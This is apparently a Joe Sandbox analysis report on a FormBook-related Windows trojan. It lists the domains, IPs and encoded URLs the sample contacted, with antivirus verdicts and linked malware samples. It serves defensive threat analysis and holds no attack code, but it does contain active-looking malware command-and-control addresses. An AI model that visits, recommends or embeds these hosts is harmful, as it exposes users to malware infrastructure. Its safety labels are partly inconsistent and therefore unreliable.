http://www.energysecrets.online/d5fo/?7b7D=uO5Cag4gyB16R4iku6nvf5dW+UrTPsxCj8IlAS8oNZUsLlnW35hToihdihlq36/h3E+gT/kMW6N0rvSH4h3g2fSBlwf/dqlLAFh1+9LorWG4QUGEfHw1eqFMmW/Mf4Jk1w==&jlx=Zd48SBF0d	100%	Avira URL Cloud	malware
http://www.biotecnology.org/d5fo/	0%	Avira URL Cloud	safe
https://www.piensasolutions.com/web-sencilla?utm_source=parking&utm_medium=link&utm_campaign	0%	Avira URL Cloud	safe
http://www.fwbkl.com	0%	Avira URL Cloud	safe
https://www.piensasolutions.com/dominios?utm_source=parking&utm_medium=link&utm_campaign=dom	0%	Avira URL Cloud	safe
https://www.piensasolutions.com/hosting?utm_source=parking&utm_medium=link&utm_campaign=host	0%	Avira URL Cloud	safe
https://piensasolutions.com/imgs/parking/icon-parking.png	0%	Avira URL Cloud	safe
https://piensasolutions.com/imgs/parking/icon-facebook-small.png	0%	Avira URL Cloud	safe
http://www.searchvity.com/	0%	Avira URL Cloud	safe
https://img.sedoparking.com/templates/images/hero_nc.svg	0%	Avira URL Cloud	safe
http://www.bitmapsportsbook.com/d5fo/?7b7D=tev49yANRQivQ2H4f+MkRUEB2Mcj1uW8WqvLk8Twyqy4p8R5Cvi5e/R3eBho8SytCOZYadrHp/TLGFpXXvbZlqSupKHvTXQyyrLbAfI6hIrWLGnSWN9T94Bpfqoaz0W+fg==&jlx=Zd48SBF0d	0%	Avira URL Cloud	safe
https://piensasolutions.com/imgs/parking/icon-twitter-small.png	0%	Avira URL Cloud	safe
http://www.www00003.icu/d5fo/	0%	Avira URL Cloud	safe
https://piensasolutions.com/imgs/parking/icon-web-sencilla.png	0%	Avira URL Cloud	safe
https://twitter.com/piensasolutions	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
primerpaintjobs.com	3.33.130.190	true	false	unknown
www.fwbkl.com	104.21.25.75	true	false	unknown
www.pandafitnessboo.com	89.31.143.90	true	false	unknown
www.techstone.top	67.223.117.189	true	false	unknown
www.energysecrets.online	66.96.162.141	true	false	unknown
www.anuts.top	23.251.54.212	true	false	unknown
www.lookstudiov.com	74.208.236.162	true	false	unknown
www.biotecnology.org	217.76.156.252	true	false	unknown
parkingpage.namecheap.com	91.195.240.19	true	false	unknown
www.www00003.icu	67.198.129.29	true	false	unknown
www.fourgrouw.cfd	unknown	unknown	true	unknown
www.inform-you.com	unknown	unknown	true	unknown
www.primerpaintjobs.com	unknown	unknown	true	unknown
www.2iqaoe.sbs	unknown	unknown	true	unknown
www.bieniastest.xyz	unknown	unknown	true	unknown
www.gacorslot188.com	unknown	unknown	true	unknown
www.eh28mf3cdv.xyz	unknown	unknown	true	unknown
www.bitmapsportsbook.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.primerpaintjobs.com/d5fo/	false	Avira URL Cloud: safe	unknown
http://www.lookstudiov.com/d5fo/?7b7D=GhGyKhGC7sKxzKp8eGdmcVyQLOHVXUrHMU0qcIbEymnWOlPdhkadwEXOFBFKC9rDKAL9A3qPLxSgX4nFFBMT0Qr3C3Mt9G1yNIIz6WxytSSBQEHhhuhnAxkZUHOGfulFQA==&jlx=Zd48SBF0d	false	Avira URL Cloud: safe	unknown
http://www.techstone.top/d5fo/?7b7D=ZtxaWCYYlalaBLbUZEg6r6j4osC8kpYtaMEhijkB8H2iy1ANSqSP0R6JXlSUbXLuwPWrlga8EoblOOmZuDHqStQkZ0ENq5OQUfKh4Zv5agv6mVk/8VHvrdHyJdoKzVeyYg==&jlx=Zd48SBF0d	false	Avira URL Cloud: safe	unknown
http://www.pandafitnessboo.com/d5fo/	false	Avira URL Cloud: malware	unknown
http://www.bieniastest.xyz/d5fo/?7b7D=LMFtkAbNwZ2elB2GqME+IyQxX7DpzdHWKaIeqICYjgo7Pf7uTIFX4zBwXYBOYcYwGUmItxrSVLCWdjm98wNi/v/M/fTrXywXbqzKp2nVAwJXJwrN8i8cZj3fKe75XwP3Sw==&jlx=Zd48SBF0d	false	Avira URL Cloud: malware	unknown
http://www.pandafitnessboo.com/d5fo/?7b7D=ZpdAgvspmy+hTWfIGO3yX+xvrXsAMei4bBOt8BxrswmHE1awNdipNiT+j4hdfFyjFWMSgEHKkrcEvKgvyxqjFaD+81oW/DCEN2Oo1sUO/kySitSS9PIrivUN0n61HzGWTA==&jlx=Zd48SBF0d	false	Avira URL Cloud: malware	unknown
http://www.anuts.top/d5fo/	false	Avira URL Cloud: safe	unknown
http://www.fwbkl.com/d5fo/	false	Avira URL Cloud: safe	unknown
http://www.bieniastest.xyz/d5fo/	false	Avira URL Cloud: malware	unknown
http://www.gacorslot188.com/d5fo/?7b7D=YgMsgDJtCOjfJyENf6IYVB+j8nyLj4HpaTgxuJv8edncauxSuygt96U33iQCFym5FChTcLDhuwePnMBbbjdGUumEJzbp4n/EDj2Sbs8WnSMUCI3AXWDzfQLO1NjL1mG45A==&jlx=Zd48SBF0d	false	Avira URL Cloud: safe	unknown
http://www.gacorslot188.com/d5fo/	false	Avira URL Cloud: safe	unknown
http://www.primerpaintjobs.com/d5fo/?7b7D=AHzm4ye+5PiW8EK3Xc8yvQbL0W8b+QDjDz3KJBw+soEJlA3iHdW1FHFMZKYf54FvxwKLR/ceGHi29plUOxZKTvSK+yeJiXyyL9T50uSOcXQBWH3FsDfUfLjchgLwvE1adw==&jlx=Zd48SBF0d	false	Avira URL Cloud: safe	unknown
http://www.bitmapsportsbook.com/d5fo/	false	Avira URL Cloud: safe	unknown
http://www.energysecrets.online/d5fo/	false	Avira URL Cloud: malware	unknown
http://www.techstone.top/d5fo/	false	Avira URL Cloud: safe	unknown
http://www.biotecnology.org/d5fo/?7b7D=Y250bjw/Eb4JaDsvBgJQoO5DcTGKRg2TY8WwpeWRYSxf0AM6NgGJQ+gzPFJsrW2WCqa86REIjEj/npni0ixUVU6cRhsYsQ6/GuFWj4cc/ehEtPjcsd8gcWhpaBoMEh18pg==&jlx=Zd48SBF0d	false	Avira URL Cloud: safe	unknown
http://www.anuts.top/d5fo/?7b7D=UorOUJsNhtzOpcbW6pRD7y2oLw3yU53b7AktnJqWMfC1hZfMFH0XzXkRJ4yWQIlKeaDAqwcN0the3qftPUt4DeI9smIFWq5tw4RBCGM6pKiUjuqW8ii8RfKWeFMpWQWMaw==&jlx=Zd48SBF0d	false	Avira URL Cloud: safe	unknown
http://www.biotecnology.org/d5fo/	false	Avira URL Cloud: safe	unknown
http://www.energysecrets.online/d5fo/?7b7D=uO5Cag4gyB16R4iku6nvf5dW+UrTPsxCj8IlAS8oNZUsLlnW35hToihdihlq36/h3E+gT/kMW6N0rvSH4h3g2fSBlwf/dqlLAFh1+9LorWG4QUGEfHw1eqFMmW/Mf4Jk1w==&jlx=Zd48SBF0d	false	Avira URL Cloud: malware	unknown
http://www.bitmapsportsbook.com/d5fo/?7b7D=tev49yANRQivQ2H4f+MkRUEB2Mcj1uW8WqvLk8Twyqy4p8R5Cvi5e/R3eBho8SytCOZYadrHp/TLGFpXXvbZlqSupKHvTXQyyrLbAfI6hIrWLGnSWN9T94Bpfqoaz0W+fg==&jlx=Zd48SBF0d	false	Avira URL Cloud: safe	unknown
http://www.www00003.icu/d5fo/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://piensasolutions.com/css/parking2.css	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://piensasolutions.com/imgs/parking/icon-desplegar.jpg	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://lookstudiov.com/d5fo/?7b7D=GhGyKhGC7sKxzKp8eGdmcVyQLOHVXUrHMU0qcIbEymnWOlPdhkadwEXOFBFKC9rDKA	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005816000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000038D6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2542910321.00000000330F6000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.piensasolutions.com/ssl?utm_source=parking&utm_medium=link&utm_campaign=correo	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.piensasolutions.com/certificado-ssl?utm_source=parking&utm_medium=link&utm_campa	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.searchvity.com/?dn=	DevicePairingWizard.exe, 00000004.00000002.4472629196.00000000067CA000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.000000000488A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.piensasolutions.com?utm_source=parking&utm_medium=link&utm_campaign=piensa	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.piensasolutions.com/crear-web?utm_source=parking&utm_medium=link&utm_campaign=we	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&utm_medium=link&utm_camp	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://piensasolutions.com/imgs/parking/icon-ssl-parking.png	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.namecheap.com/domains/registration/results/?domain=bieniastest.xyz	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000006638000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4474271671.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000046F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plus.google.com/u/0/102310483732773374239	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://piensasolutions.com/imgs/parking/icon-hosting.png	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://piensasolutions.com/imgs/parking/icon-web.png	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sedo.com/services/parking.php3	ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000046F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.piensasolutions.com/web-sencilla?utm_source=parking&utm_medium=link&utm_campaign	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fwbkl.com	ljryBmFNsYlm.exe, 00000006.00000002.4473303315.000000000581C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.piensasolutions.com/dominios?utm_source=parking&utm_medium=link&utm_campaign=dom	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.piensasolutions.com/hosting?utm_source=parking&utm_medium=link&utm_campaign=host	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://piensasolutions.com/imgs/parking/icon-parking.png	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.searchvity.com/	DevicePairingWizard.exe, 00000004.00000002.4472629196.00000000067CA000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.000000000488A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://piensasolutions.com/imgs/parking/icon-facebook-small.png	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.sedoparking.com/templates/images/hero_nc.svg	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000006638000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4474271671.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000046F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://piensasolutions.com/imgs/parking/icon-twitter-small.png	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://twitter.com/piensasolutions	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://piensasolutions.com/imgs/parking/icon-web-sencilla.png	DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.251.54.212	www.anuts.top	United States	62468	VPSQUANUS	false
67.223.117.189	www.techstone.top	United States	15189	VIMRO-AS15189US	false
67.198.129.29	www.www00003.icu	United States	35908	VPLSNETUS	false
74.208.236.162	www.lookstudiov.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	false
66.96.162.141	www.energysecrets.online	United States	29873	BIZLAND-SDUS	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
3.33.130.190	primerpaintjobs.com	United States	8987	AMAZONEXPANSIONGB	false
89.31.143.90	www.pandafitnessboo.com	Germany	15598	QSC-AG-IPXDE	false
104.21.25.75	www.fwbkl.com	United States	13335	CLOUDFLARENETUS	false
217.76.156.252	www.biotecnology.org	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481629
Start date and time:	2024-07-25 12:05:42 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002B_466.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@16/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 57 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: LisectAVT_2403002B_466.exe

Simulations

Behavior and APIs

Time	Type	Description
06:07:26	API Interceptor	11347997x Sleep call for process: DevicePairingWizard.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.251.54.212	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/
	BL7247596940.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
	Arrival Notice.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.anuts.top/niik/
67.223.117.189	Shipping Documents 7896424100.exe	Get hash	malicious	FormBook	Browse	www.nodedev.top/wnsq/
	ORDEN_240715189833.IMG	Get hash	malicious	DarkTortilla, FormBook	Browse	www.akissdove.xyz/8ntn/
	OrderPI.exe	Get hash	malicious	FormBook	Browse	www.helidove.xyz/no40/
	PRE-ALERT HTHC22031529.exe	Get hash	malicious	FormBook	Browse	www.nodedev.top/wnsq/
	Scan405.exe	Get hash	malicious	FormBook	Browse	www.bandbid.top/38gc/
	ScanPDF_102.exe	Get hash	malicious	FormBook	Browse	www.bandbid.top/38gc/
	SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exe	Get hash	malicious	FormBook	Browse	www.nodedev.top/o93t/
	9hD6o07kwl.exe	Get hash	malicious	FormBook	Browse	www.advenhub.online/0so0/
	TFMUpLhFq6.exe	Get hash	malicious	FormBook	Browse	www.bandbid.top/38gc/
	g7cydE7LET.exe	Get hash	malicious	FormBook	Browse	www.bandbid.top/38gc/
67.198.129.29	A6en1Q0smW.exe	Get hash	malicious	FormBook	Browse
74.208.236.162	8hd98EhtIFcYkb8.exe	Get hash	malicious	FormBook	Browse	www.lookstudiov.com/u4jq/
	8eBzSB5cmamfLKJ.exe	Get hash	malicious	FormBook	Browse	www.lookstudiov.com/u4jq/
	Urgent Quotation_pdf.exe	Get hash	malicious	FormBook	Browse	www.lookstudiov.com/u4jq/
	Lowe_list0605002024.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.lookstudiov.com/gnbc/
	f4CdNDrJp8.exe	Get hash	malicious	FormBook	Browse	www.lookstudiov.com/gnbc/
	payment advice_008900112.exe	Get hash	malicious	FormBook	Browse	www.grade8.tech/cxep/?B2=mybim3PU4WZ6VszKjRRoYw8uN57IzpbZCoMRC19UjfgspFBzQg29lVSjlHJQb4ufvz2f&m64=LHcPZ

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.techstone.top	UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.236.122
www.pandafitnessboo.com	unexpressiveness.exe	Get hash	malicious	FormBook, GuLoader	Browse	89.31.143.90
	Ballahoo.exe	Get hash	malicious	FormBook, GuLoader	Browse	89.31.143.90
	UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exe	Get hash	malicious	FormBook	Browse	89.31.143.90
	DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exe	Get hash	malicious	FormBook	Browse	89.31.143.90
	DHL Overdue Account Notice - 1606622076.PDF.exe	Get hash	malicious	FormBook	Browse	89.31.143.90
	LPO-582-AL SAFA.exe	Get hash	malicious	FormBook	Browse	89.31.143.90
	manufacturer this requirements.exe	Get hash	malicious	FormBook	Browse	89.31.143.90
www.lookstudiov.com	8hd98EhtIFcYkb8.exe	Get hash	malicious	FormBook	Browse	74.208.236.162
	8eBzSB5cmamfLKJ.exe	Get hash	malicious	FormBook	Browse	74.208.236.162
	Urgent Quotation_pdf.exe	Get hash	malicious	FormBook	Browse	74.208.236.162
	UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exe	Get hash	malicious	FormBook	Browse	74.208.236.162
	Lowe_list0605002024.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	74.208.236.162
	f4CdNDrJp8.exe	Get hash	malicious	FormBook	Browse	74.208.236.162
	Sf5Aw7E8Cu.exe	Get hash	malicious	FormBook, GuLoader	Browse	74.208.236.162
www.fwbkl.com	9hD6o07kwl.exe	Get hash	malicious	FormBook	Browse	172.67.223.246
	our order 6076297.exe	Get hash	malicious	FormBook	Browse	172.67.223.246
	ccWXalS8xg.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.223.246
	PO 1402-16 AH.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.223.246
	Quotation MEW Tender 2024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.223.246
	N270-10-MR-1671-01.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.25.75
www.anuts.top	docs_pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Attendance list.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	2OdHcYtYOMOepjD.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Tekstlinie.vbs	Get hash	malicious	FormBook, GuLoader	Browse	23.251.54.212
	Purchase order.pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	dMY6QiHAIpPPqiV.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Purchase order.pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	33BMmt58Bj.exe	Get hash	malicious	FormBook	Browse	23.251.54.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VIMRO-AS15189US	H37012.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	67.223.118.13
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, LummaC Stealer	Browse	67.223.119.7
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, LummaC Stealer	Browse	67.223.119.7
	Shipping Documents 7896424100.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
	ORDEN_240715189833.IMG	Get hash	malicious	DarkTortilla, FormBook	Browse	67.223.117.189
	OrderPI.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
	PO HA25622.exe	Get hash	malicious	FormBook	Browse	67.223.118.13
	PRE-ALERT HTHC22031529.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
	Scan405.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
	ScanPDF_102.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
VPSQUANUS	http://aggwgwqghgmyti.com/pfd12_2000002719_4001340.exe	Get hash	malicious	Unknown	Browse	198.44.184.47
	Electronic Order.exe	Get hash	malicious	FormBook	Browse	154.222.238.52
	qGf6yeA9wI.elf	Get hash	malicious	Mirai	Browse	69.165.74.76
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Attendance list.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	AWB 112-17259653.exe	Get hash	malicious	FormBook	Browse	198.44.170.208
	Rn1AkuRExh.elf	Get hash	malicious	Mirai	Browse	103.252.20.91
	c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exe	Get hash	malicious	SystemBC	Browse	198.44.190.49
	tpwinprn.dll	Get hash	malicious	GhostRat	Browse	156.235.99.47
	6z70AuHrHI.dll	Get hash	malicious	Unknown	Browse	156.235.99.47
VPLSNETUS	SecuriteInfo.com.FileRepMalware.25505.20211.exe	Get hash	malicious	Unknown	Browse	66.186.50.50
	arm.elf	Get hash	malicious	Mirai	Browse	67.229.74.119
	bolonetwork.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	184.164.217.225
	95DVgihS4k.elf	Get hash	malicious	Unknown	Browse	67.229.75.73
	hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse	74.119.238.38
	RFQ_372842754579.pdf.exe	Get hash	malicious	AgentTesla	Browse	74.119.238.38
	BEddZjSb7A.elf	Get hash	malicious	Unknown	Browse	174.139.231.30
	wNJM6XQwaZ.elf	Get hash	malicious	Unknown	Browse	98.126.6.63
	czEunnbk7b.elf	Get hash	malicious	Mirai	Browse	98.126.6.34
	A6en1Q0smW.exe	Get hash	malicious	FormBook	Browse	67.198.129.29
ONEANDONE-ASBrauerstrasse48DE	LisectAVT_2403002C_62.dll	Get hash	malicious	Emotet	Browse	87.106.46.107
	IIMG_00172424.exe	Get hash	malicious	FormBook	Browse	217.160.230.215
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	217.160.0.226
	zkGOUJOnmc.elf	Get hash	malicious	Unknown	Browse	88.208.252.9
	Fzfee1Lgc2.elf	Get hash	malicious	Unknown	Browse	217.160.0.225
	gUJak0onLk.elf	Get hash	malicious	Unknown	Browse	217.160.0.116
	Yb6ztdvQaB.elf	Get hash	malicious	Unknown	Browse	217.160.0.3
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	74.208.236.5
	Wk8eTHnajw.elf	Get hash	malicious	Unknown	Browse	217.160.0.241
	0SpHek7Jd8.elf	Get hash	malicious	Unknown	Browse	77.68.101.101

